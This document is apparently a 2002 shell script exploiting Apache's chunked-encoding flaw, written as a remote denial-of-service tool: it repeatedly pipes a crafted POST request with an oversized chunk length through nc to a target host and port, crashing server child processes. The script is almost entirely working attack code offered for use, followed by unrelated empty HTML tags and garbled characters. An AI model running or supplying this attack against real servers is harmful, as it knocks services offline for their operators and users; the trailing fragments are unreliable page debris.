#!/bin/sh # Apache remote DoS (1.3.x/2.0.x branches) based on the recent flaw met in chunked encoding. # Please read http://httpd.apache.org/info/security_bulletin_20020620.txt # # On successful exploatation the Apache child process will exit with SIGSEGV, e.g.: # [Thu Jun 20 22:34:52 2002] [notice] child pid 804 exit signal Segmentation fault (11) # # For testing purposes only. # # Pavel Georgiev declare -x PATH="/bin:/usr/bin:/usr/local/bin" declare -x RP="nc sleep tput" declare -x IP="$1" declare -x PT="$2" check_rp() { for n in ${RP} ; do if [ -x /bin/${n} ] ; then eval "export ${n}=/bin/${n}" elif [ -x /usr/bin/${n} ] ; then eval "export ${n}=/usr/bin/${n}" else printf "\nEither lacking ${n} or not in PATH. Aborting.\n" ; exit 0 ; fi ; done } smash_ap() { while sleep 0 ; do (printf "POST /foo.htm HTTP/1.1\nHost: $IP\nTransfer-Encoding: chunked\n\n90000000\n\n" | nc $IP $PT ) ; done } s_usage() { tput clear ; printf "\nSyntax: `basename $0` \n\n" } check_rp ; if [ "$2" ] ; then smash_ap ; else s_usage ; fi
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            ÑÇÖÞÅ·ÃÀÔÚÏß